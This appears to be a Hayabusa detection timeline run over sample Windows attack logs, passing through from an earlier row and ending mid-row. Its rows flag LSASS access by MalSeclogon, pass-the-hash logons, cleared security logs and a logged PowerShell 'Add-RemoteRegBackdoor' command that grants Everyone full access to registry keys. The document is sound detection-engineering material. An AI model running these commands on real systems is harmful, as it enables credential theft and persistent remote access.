Addr: 10.23.23.9 | LID: 0x10e6e8f26,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx 2021-12-05 07:09:13.672 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f3e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx 2021-12-05 07:09:13.673 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f54,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx 2021-12-05 07:09:18.652 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x10e6e929b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx 2021-12-08 02:33:01.409 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: MalSeclogon.exe -p 636 -d 2 | Process: \\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x53ca2 | PID: 8612 | PGUID: 747F3D96-9ACD-61AF-D301-000000000102",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx 2021-12-08 02:33:01.474 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: - | LID: 0x3e7 | PID: 7108 | PGUID: 747F3D96-9ACD-61AF-D401-000000000102,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx 2021-12-08 02:33:01.485 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\svchost.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: NT AUTHORITY\NETWORK SERVICE | Tgt User: NT AUTHORITY\SYSTEM | Access: 0x100000 | Src PID: 884 | Src PGUID: 747F3D96-0BA4-61B0-1200-000000000102 | Tgt PID: 7108 | Tgt PGUID: 747F3D96-9ACD-61AF-D401-000000000102,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx 2021-12-08 02:33:01.616 +09:00,MSEDGEWIN10,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer: - | IP Addr: ::1 | LID: 0x16e3db3 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx 2021-12-08 02:33:01.616 +09:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx 2021-12-08 02:33:01.616 +09:00,MSEDGEWIN10,4624,high,LatMov,Successful Overpass the Hash Attempt,,../hayabusa-rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx 2021-12-08 02:33:01.636 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: MalSeclogon.exe -p 636 -d 2 -l 1 | Process: \\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: - | LID: 0x16e3db3 | PID: 6072 | PGUID: 747F3D96-9ACD-61AF-D501-000000000102,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx 2021-12-08 02:33:01.638 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Tgt Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Src User: MSEDGEWIN10\IEUser | Tgt User: MSEDGEWIN10\IEUser | Access: 0x100000 | Src PID: 8612 | Src PGUID: 747F3D96-9ACD-61AF-D301-000000000102 | Tgt PID: 6072 | Tgt PGUID: 747F3D96-9ACD-61AF-D501-000000000102,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx 2021-12-08 02:33:01.680 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: MSEDGEWIN10\IEUser | Tgt User: NT AUTHORITY\SYSTEM | Access: 0x1410 | Src PID: 6072 | Src PGUID: 747F3D96-9ACD-61AF-D501-000000000102 | Tgt PID: 5268 | Tgt PGUID: 747F3D96-9ACD-61AF-D701-000000000102,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx 2021-12-08 02:33:01.680 +09:00,MSEDGEWIN10,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx 2021-12-08 02:33:01.680 +09:00,MSEDGEWIN10,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx 2021-12-09 22:41:50.714 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: hack1,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4624-RottenPotatoNG.evtx" 2021-12-10 03:50:47.980 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.333 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4d5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4ed,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4fe,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d51f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4d5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4ed,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4fe,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d51f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.958 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.958 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:55.958 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:56.005 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:56.052 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2f10a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:56.052 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2f10a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:56.052 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:56.099 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:56.146 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:51:16.683 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9e8 | User: FS03$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 04:54:03.261 +09:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,Add-RemoteRegBackdoor -ComputerName FS03 -Trustee 'S-1-1-0',../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.261 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : ] Using trustee username 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.370 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-WmiObject): ""Get-WmiObject"" ParameterBinding(Get-WmiObject): name=""Class""; value=""Win32_Service"" ParameterBinding(Get-WmiObject): name=""Filter""; value=""name='RemoteRegistry'"" ParameterBinding(Get-WmiObject): name=""ComputerName""; value=""FS03""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.370 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03] Attaching to remote registry through StdRegProv""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.370 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-WmiObject): ""Get-WmiObject"" ParameterBinding(Get-WmiObject): name=""Namespace""; value=""root/default"" ParameterBinding(Get-WmiObject): name=""Class""; value=""Meta_Class"" ParameterBinding(Get-WmiObject): name=""Filter""; value=""__CLASS = 'StdRegProv'"" ParameterBinding(Get-WmiObject): name=""ComputerName""; value=""FS03""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.386 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring started for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.417 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.417 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.435 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.435 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.435 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.451 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.453 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring completed for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.453 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring started for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.453 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.453 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.468 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.468 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.468 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.468 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.486 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring completed for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.486 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring started for 